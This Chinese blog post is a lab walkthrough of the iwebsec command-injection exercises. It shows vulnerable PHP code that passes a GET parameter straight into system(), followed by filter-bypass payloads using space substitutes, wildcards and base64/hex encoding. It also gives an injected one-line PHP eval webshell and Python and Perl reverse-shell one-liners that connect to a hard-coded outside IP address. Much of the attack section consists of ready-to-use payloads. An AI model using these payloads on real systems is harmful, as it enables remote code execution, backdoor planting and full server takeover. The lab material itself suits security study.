命令执行漏洞 | iwebsec

news2024/11/14 3:15:13

文章目录

    • 1 靶场环境
    • 2 命令执行漏洞介绍
    • 3 靶场练习
      • 01-命令执行漏洞
      • 02-命令执行漏洞空格绕过
      • 03-命令执行漏洞关键命令绕过
      • 04-命令执行漏洞通配符绕过
      • 05-命令执行漏洞base64编码绕过
    • 4 命令执行漏洞危害
      • 01-读写系统文件
      • 02-执行系统命令
      • 03-种植恶意木马
      • 04-反弹shell
        • python反弹shell
        • perl反弹shell

1 靶场环境

这是 iwebsec 靶场,具体搭建过程可以看前面的文章。

在这里插入图片描述

2 命令执行漏洞介绍

应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常的命令中,从而造成命令执行攻击,这就是命令执行漏洞。【摘自《web安全攻防》】

Windows系统支持的管道符:

管道符作用举例
|直接执行后面的命令。在这里插入图片描述
||前面执行的命令执行出错才执行后面的语句。在这里插入图片描述
&前面的语句无论真假都可以执行后面的语句。(无条件执行后面的语句,推荐使用。)在这里插入图片描述
&&前面语句为真才能执行后面的语句。在这里插入图片描述

Linux系统支持的管道符:

管道符作用举例
|显示后面语句的执行结果。在这里插入图片描述
;执行完前面的语句再执行后面的。在这里插入图片描述
||前面语句执行错误才执行后面的语句。在这里插入图片描述
&前面语句无论真假都会执行后面的语句。(无条件执行后面的语句,推荐使用。)在这里插入图片描述
&&前面的语句为真才能执行后面的语句。在这里插入图片描述

3 靶场练习

01-命令执行漏洞

打开靶场,直接测试。使用|

在这里插入图片描述

使用;

在这里插入图片描述

使用||

在这里插入图片描述

使用cat命令获取文件。

在这里插入图片描述

看网页源码,发现cat到文件源码。

在这里插入图片描述

获取/etc/passwd文件。

在这里插入图片描述

命令执行漏洞代码分析

服务端处理 ping ,程序获取GET参数IP,然后拼接到system() 函数中,利用 system() 函数执行ping的功能,但此处没有对参数IP做过滤和检测,导致可以利用管道符执行其他的系统命令。

<?php
  require_once('../header.php');
?>

<html>
	<head>
		<title>命令执行漏洞</title>
	</head>
	<h2>命令执行漏洞</h2>
		<div class="alert alert-success">
			<p>/01.php?ip=127.0.0.1 </p>
		</div>
	<body>

<?php
	if(isset($_GET['ip'])){
	    $ip = $_GET['ip'];//用户可以控制
	    system("ping -c 2 ".$ip);//system系统命令,没有限制
	}else{
		exit();
	}
?>

02-命令执行漏洞空格绕过

在这里插入图片描述

过滤了空格,可以去掉空格。

在这里插入图片描述

管道符两边的空格可以去除。但是有些是不能去除的,比如cat /ect/passwd,我们可以想办法绕过空格:

  1. 使用%09%09是tab键的url编码。
    在这里插入图片描述

  2. 使用<< 表示的是输入重定向的意思,就是把<后面跟的文件取代键盘作为新的输入设备。“命令 < 文件” ,这是将文件作为命令输入。
    在这里插入图片描述

  3. 使用{},用,实现空格可能。
    在这里插入图片描述

  4. 使用${IFS}
    在这里插入图片描述

  5. 使用$IFS$9
    在这里插入图片描述

源码分析

<?php
	if(isset($_GET['ip'])){
		if (preg_match('/ /', $_GET['ip'])) {  //匹配空格
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
?>

03-命令执行漏洞关键命令绕过

在这里插入图片描述

cat命令的绕过:

  1. 使用常规绕过

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  1. 非常规操作

在这里插入图片描述

在这里插入图片描述

其他的试了,不行。我用自己的Linux系统试试:

在这里插入图片描述

在这里插入图片描述

  1. 使用符号及拼接

在这里插入图片描述

在这里插入图片描述

源码分析

<?php
	if(isset($_GET['ip'])){
		if (preg_match('/cat/', $_GET['ip'])) {  //过滤了cat
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];		
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}	
?>

04-命令执行漏洞通配符绕过

<?php
	if(isset($_GET['ip'])){
		if (preg_match('/etc|passwd/', $_GET['ip'])) {
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];	
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
?>

看源码只是过滤了/etc/passwd文件,读取其他文件是没有问题的:

在这里插入图片描述

在这里插入图片描述

但我就是要读取/etc/passwd文件呢?

  1. 可以使用通配符绕过:

通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查找文件夹时,可以使用它来代替一个或多个真正字符;当不知道真正字符或者懒得输入完整名字时,常常使用通配符代替一个或多个真正的字符。 【百度百科】

在这里插入图片描述

在这里插入图片描述

  1. 使用符号及拼接

在这里插入图片描述

在这里插入图片描述

05-命令执行漏洞base64编码绕过

在这里插入图片描述

直接就可以RCE,看一下源码:

<?php
	if(isset($_GET['ip'])){
		if (preg_match('/id/', $_GET['ip'])) {
                die('error!!!');
		}
		else{
			$ip = $_GET['ip'];
			
		}
    system("ping -c 2 ".$ip);
	}else{
		exit();
	}
?>

过滤了id这个关键字,Linux id命令用于显示用户的ID,以及所属群组的ID

在这里插入图片描述

使用base64编码绕过:

echo aWQ= | base64 -d 

在这里插入图片描述

第一个例子直接输出为id,第二个例子加了反引号`则会执行输出的内容,即执行命令id

在这里插入图片描述

除了base64,我们可以使用hex编码:

ip=127.0.0.1 | echo "6964" | xxd -r -p | bash
ip=127.0.0.1 | `echo "6964" | xxd -r -p`

在这里插入图片描述

在这里插入图片描述

第一句直接输出id,第二句将输出的内容传进bash执行。也可以不用bash执行,直接用反引号执行。

在这里插入图片描述

读取/etc/passwd文件:

在这里插入图片描述

在这里插入图片描述

4 命令执行漏洞危害

以第一关的环境为例,进行下面的实验。

01-读写系统文件

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

02-执行系统命令

常见linux系统命令大全

使用touch命令新建一个文件

在这里插入图片描述

在这里插入图片描述

pwd查看当前目录的位置

在这里插入图片描述

使用find命令搜索符合条件的文件

在这里插入图片描述

显示指定目录下所有目录和文件,包括隐藏文件

在这里插入图片描述

03-种植恶意木马

写入一句话木马

?ip=127.0.0.1|echo '<?php @eval($_POST['a']);?>' >2.php

在这里插入图片描述

连接一句话木马

在这里插入图片描述

在这里插入图片描述

用蚁剑连接

在这里插入图片描述

04-反弹shell

RCE/命令执行漏洞反弹shell小结。这里使用第三关环境,第一关被我改坏了。

我用bash反弹,一直写不进去,但是一句话木马又可以写入,按照源码只是对cat进行过滤而已,应该没有过滤其他东西了。试着把反弹shell逐个拆开写进去:

在这里插入图片描述

在这里插入图片描述

那应该是不能有&,所以bashphp的反弹shell语句都用不了。而python的反弹shell语句刚好没有:

python反弹shell

注入点:127.0.0.1|python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("8.134.148.36",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
监听点:nc -lvp 7777

在这里插入图片描述
在这里插入图片描述

perl反弹shell

注入点:127.0.0.1|perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"8.134.148.36:6666");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
监听点:nc -lvp 6666

在这里插入图片描述

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/372856.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Android 基础知识4-3.4 ImageView(图像视图)详解

一、ImageView简介 ImageView是Android开发中最常用的组件之一&#xff0c;主要用于显示图片&#xff0c;但是它不只是能显示图片&#xff0c;任何Drawable对象都可以使用它来显示。 二、ImageView 的继承关系 ImageView的继承关系 如下&#xff1a; java.lang.Object 《-- …

生成式语言大模型压缩技术思考——以ChatGPT为例

ChatGPT引领了生成式语言大模型的应用与技术热潮&#xff0c;首先简单回顾ChatGPT应用范式&#xff1a;将其应用于指定的下游任务时&#xff08;如知识问答、翻译、编码&#xff09;&#xff0c;ChatGPT需要经历三个阶段的训练&#xff08;增强人类语境的猜想&#xff09;&…

基于nodejs+vue的平面设计课程管理系统vscode

后台由管理员&#xff0c;教师和学生三个角色&#xff0c;其主要功能包括首页&#xff0c;个人中心&#xff0c;学生管理&#xff0c;教师管理&#xff0c;课程类型管理&#xff0c;课程学习管理&#xff0c;试题讲解管理&#xff0c;作业信息管理&#xff0c;作业提交管理&…

Flutter3引用原生播放器-IOS(Swift)篇

前言由于Flutter项目中需要使用到播放器功能&#xff0c;因此对flutter中各种播放器解决方案进行了一番研究和比对&#xff0c;最后决定还是自己通过Plugin的方法去引用原生播放器符合自己的需求&#xff0c;本篇文章会对各种解决方案做一个简单的比较&#xff0c;以及讲解一下…

STM32—DMA

什么是DMA&#xff1f; DMA(Direct Memory Access&#xff0c;直接存储器访问) 提供在外设与内存、存储器和存储器、外设与外设之间的高速数据传输使用。它允许不同速度的硬件装置来沟通&#xff0c;而不需要依赖于CPU&#xff0c;在这个时间中&#xff0c;CPU对于内存的工作来…

Leetcode 剑指 Offer II 016. 不含重复字符的最长子字符串

题目难度: 中等 原题链接 今天继续更新 Leetcode 的剑指 Offer&#xff08;专项突击版&#xff09;系列, 大家在公众号 算法精选 里回复 剑指offer2 就能看到该系列当前连载的所有文章了, 记得关注哦~ 题目描述 给定一个字符串 s &#xff0c;请你找出其中不含有重复字符的最长…

软考之操作系统知识

目录 1.进程管理-进程的概念 2.进程的三态图和五态图 3.进程的同步与互斥 4.PV操作应用 5.死锁问题 6.银行家算法 7.存储管理 8.段式存储组织 9.段页式存储组织 10.页面置换算法 11.磁盘管理 12.作业管理 13.索引文件结构 14.树型目录结构 15.空闲存储空间管理 …

第四届蓝桥杯省赛 C++ B组 - 翻硬币

✍个人博客&#xff1a;https://blog.csdn.net/Newin2020?spm1011.2415.3001.5343 &#x1f4da;专栏地址&#xff1a;蓝桥杯题解集合 &#x1f4dd;原题地址&#xff1a;翻硬币 &#x1f4e3;专栏定位&#xff1a;为想参加蓝桥杯的小伙伴整理常考算法题解&#xff0c;祝大家都…

人工智能学习07--pytorch09--LeNet

参考&#xff1a; 视频&#xff1a; https://www.bilibili.com/video/BV187411T7Ye/?spm_id_from333.999.0.0&vd_sourceb425cf6a88c74ab02b3939ca66be1c0d 博客&#xff1a;https://blog.csdn.net/STATEABC/article/details/123661612?utm_mediumdistribute.pc_feed_404.…

如何使用goquery进行HTML解析以及它的源码分析和实现原理

目录 goquery 是什么 goquery 能用来干什么 goquery quick start 玩转goquery.Find() 查找多个标签 Id 选择器 Class 选择器 属性选择器 子节点选择器 内容过滤器 goquery 源码分析 图解源码 总结 goquery 简介 goquery是一款基于Go语言的HTML解析库&#xff0c;…

聚类算法(上):8个常见的无监督聚类方法介绍和比较

无监督聚类方法的评价指标必须依赖于数据和聚类结果的内在属性&#xff0c;例如聚类的紧凑性和分离性&#xff0c;与外部知识的一致性&#xff0c;以及同一算法不同运行结果的稳定性。 本文将全面概述Scikit-Learn库中用于的聚类技术以及各种评估方法。 本文将分为2个部分&…

【Mac 教程系列】如何在 Mac 中用终端命令行方式打开 Sublime Text ?

如何在 Mac 中用终端命令行方式打开 Sublime Text ? 用 markdown 格式输出答案。 不少于1000字。细分到2级目录。 如何在 Mac 中用终端命令行方式打开 Sublime Text ? 一、首先确保已经安装 Sublime Text 前往官网https://www.sublimetext.com/下载 Sublime Text&#xff0c…

Bootstrap表单的使用

文章目录前言一、创建基础表单垂直表单&#xff08;默认&#xff09;内联表单&#xff08;水平显示&#xff09;表单控制尺寸大小给表单控件添加帮助文本禁用/只读表单无边框的控件取色器选择菜单&#xff08;默认宽度100%&#xff09;调整下拉菜单的大小表单开关滑块表单组多个…

LabVIEW网络服务安全

LabVIEW网络服务安全如何保护Web服务&#xff1f;当许多人考虑安全性时&#xff0c;他们会考虑加密、用户ID和密码。用户ID和密码用于授权&#xff08;告诉目标谁在发出请求&#xff09;。加密保护客户端和服务器之间的通信流量&#xff0c;以便未经授权的个人无法拦截和读取发…

【架构师】零基础到精通——康威定律

博客昵称&#xff1a;架构师Cool 最喜欢的座右铭&#xff1a;一以贯之的努力&#xff0c;不得懈怠的人生。 作者简介&#xff1a;一名Coder&#xff0c;软件设计师/鸿蒙高级工程师认证&#xff0c;在备战高级架构师/系统分析师&#xff0c;欢迎关注小弟&#xff01; 博主小留言…

20_FreeRTOS低功耗模式

目录 低功耗模式简介 STM32低功耗模式 Tickless模式详解 Tickless模式相关配置 实验源码 低功耗模式简介 很多应用场合对于功耗的要求很严格,比如可穿戴低功耗产品、物联网低功耗产品等。 一般MCU都有相应的低功耗模式,裸机开发时可以使用MCU的低功耗模式。 FreeRTOS也…

Linux学习(8.7)命令与文件的搜寻

目录 命令与文件的搜寻 which 文件档名的搜寻&#xff1a; whereis (寻找特定文件) locate find 以下内容转载自鸟哥的Linux私房菜 命令与文件的搜寻 which 这个命令是根据『PATH』这个环境变量所规范的路径&#xff0c;去搜寻『运行档』的档名&#xff5e; 所以&am…

计算机组成原理——运算方法续集(浮点数表示法)

浮点表示法把一个数字的有效数字和数的范围在计算机的一个存储单元中分别予以表示。这种精度分别表示的方法&#xff0c;相当于数的小数点位置随比例因子的不同而在一定范围内可以浮点&#xff0c;所以称为浮点表示法。在计算机中一个任意二进制数N可以写成N 2^e.M其中M称为浮…

Overleaf推广奖励:增加合作者的数量、解锁Dropbox同步和项目修改历史

Overleaf推广奖励 Overleaf是一个LaTeX\LaTeXLATE​X在线编译器&#xff0c;它可以让你与合作者共同在线编辑文档。但是默认的免费账号仅能邀请一个合作者。那么如何增加合作者的数量呢&#xff1f; Overleaf推出了一个奖励计划&#xff0c;你邀请其他人注册Overleaf&#xf…

使用MavenCentral发布Kotlin多平台库的远程依赖(KMM,KMP)

前言 开发者可能都会做自己的开源库,像我以前只做一些单平台的,如Android或JVM平台,这时候直接使用jitpack即可,很简单就能发布远程依赖 jitpack参考: 发布开源库的踩坑经历:jitpack.io_李小白lt的博客 而现在Kotlin可以通过expect来实现原生多平台项目(或库),这时我们开发…